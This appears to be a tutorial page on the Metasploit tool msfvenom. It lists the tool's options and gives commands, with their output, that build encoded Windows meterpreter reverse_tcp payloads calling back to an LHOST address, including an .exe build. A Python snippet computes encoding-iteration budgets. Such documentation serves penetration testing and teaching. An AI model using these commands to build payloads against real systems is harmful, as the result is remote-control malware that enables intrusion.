Options:
    -p, --payload    [payload]       Payload to use. Specify a '-' or stdin to use custom payloads
    -l, --list       [module_type]   List a module type example: payloads, encoders, nops, all
    -n, --nopsled    [length]        Prepend a nopsled of [length] size on to the payload
    -f, --format     [format]        Format to output results in: raw, ruby, rb, perl, pl, c, js_be, js_le, java, dll, exe, exe-small, elf, macho, vba, vbs, loop-vbs, asp, war
    -e, --encoder    [encoder]       The encoder to use
    -a, --arch       [architecture]  The architecture to use
        --platform   [platform]      The platform of the payload
    -s, --space      [length]        The maximum size of the resulting payload
    -b, --bad-chars  [list]          The list of characters to avoid example: '\x00\xff'
    -i, --iterations [count]         The number of times to encode the payload
    -x, --template   [path]          Specify a custom executable file to use as a template
    -k, --keep                       Preserve the template behavior and inject the payload as a new thread
    -h, --help                       Show this message
msfvenom -p <PAYLOAD> -e <ENCODER> -f <output format> > filename
Eg:
msfvenom -p windows/meterpreter/reverse_tcp -f raw -e x86/syst LHOST=<our ip> | msfvenom -e x86/shikata_ga_nai -a x86 --platform windows -f exe > meter.exe
On the Rapid7 site an example of using the script was also given, namely the creation of a payload (reverse_tcp):
fahrenheit:msf3 bannedit$ msfvenom -p windows/meterpreter/reverse_tcp -f ruby -e -i 3 -s 480 LHOST=192.168.0.120
[*] x86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration = 3)
This creates a payload in ruby format with the shikata_ga_nai encoder, chosen automatically by encoder rank; -s 480 indicates that the output must not exceed 480 bytes, and finally LHOST=192.168.0.120 sets the LHOST variable for use with the payload.
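As an added illustration (not code from the original page or from the Metasploit project), the following Python snippet parses the "succeeded with size" status lines shown above, derives the constant number of bytes each shikata_ga_nai pass adds, and works out how many -i passes would still fit within a -s budget; the sample status lines are constructed from the page's own output.

```python
import re

# Status line format printed for each encoding pass (as shown on the page).
STATUS_RE = re.compile(
    r"\[\*\]\s+(?P<encoder>\S+)\s+succeeded with size\s+(?P<size>\d+)"
    r"\s+\(iteration\s*=\s*(?P<iter>\d+)\)"
)


def parse_status(output):
    """Return a sorted list of (iteration, size) pairs found in tool output."""
    pairs = [(int(m["iter"]), int(m["size"])) for m in STATUS_RE.finditer(output)]
    return sorted(pairs)


def stub_overhead(pairs):
    """Bytes added per encoding pass, or None if the growth is not constant."""
    deltas = {b - a for (_, a), (_, b) in zip(pairs, pairs[1:])}
    return deltas.pop() if len(deltas) == 1 else None


def max_iterations(pairs, space):
    """Largest -i count whose output still fits the -s budget.

    Assumes every further pass adds the same overhead as the observed
    passes (a linear size model); if the growth is not constant, only the
    observed iterations are considered and nothing is extrapolated.
    """
    fitting = [it for it, size in pairs if size <= space]
    if not fitting:
        return 0
    overhead = stub_overhead(pairs)
    if overhead is None or overhead <= 0:
        return max(fitting)
    first_iter, first_size = pairs[0]
    return first_iter + (space - first_size) // overhead


# Constructed sample: the three status lines the page shows for -i 3.
SAMPLE = """\
[*] x86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration = 3)
"""

if __name__ == "__main__":
    pairs = parse_status(SAMPLE)
    print(pairs)                       # [(1, 317), (2, 344), (3, 371)]
    print(stub_overhead(pairs))        # 27
    print(max_iterations(pairs, 480))  # 7
```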
A comparison of execution speed is also given.
The first example shows the execution time of msfvenom, while the second shows that of msfpayload and msfencode together:
fahrenheit:msf3 bannedit$ time ./msfvenom -p windows/meterpreter/reverse_tcp -e -i 3 LHOST=192.168.0.120 -f ruby 1>/dev/null
[*] x86/shikata_ga_nai succeeded with size 317 (iteration = 1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration = 2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration = 3)
real 0m2.744s
user 0m2.380s
sys  0m0.367s
fahrenheit:msf3 bannedit$ time ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.120 R | ./msfencode -c 3 1>/dev/null
[*] x86/shikata_ga_nai succeeded with size 321 (iteration = 1)
[*] x86/shikata_ga_nai succeeded with size 348 (iteration = 2)
[*] x86/shikata_ga_nai succeeded with size 375 (iteration = 3)
real 0m3.070s
user 0m4.227s
sys  0m0.778s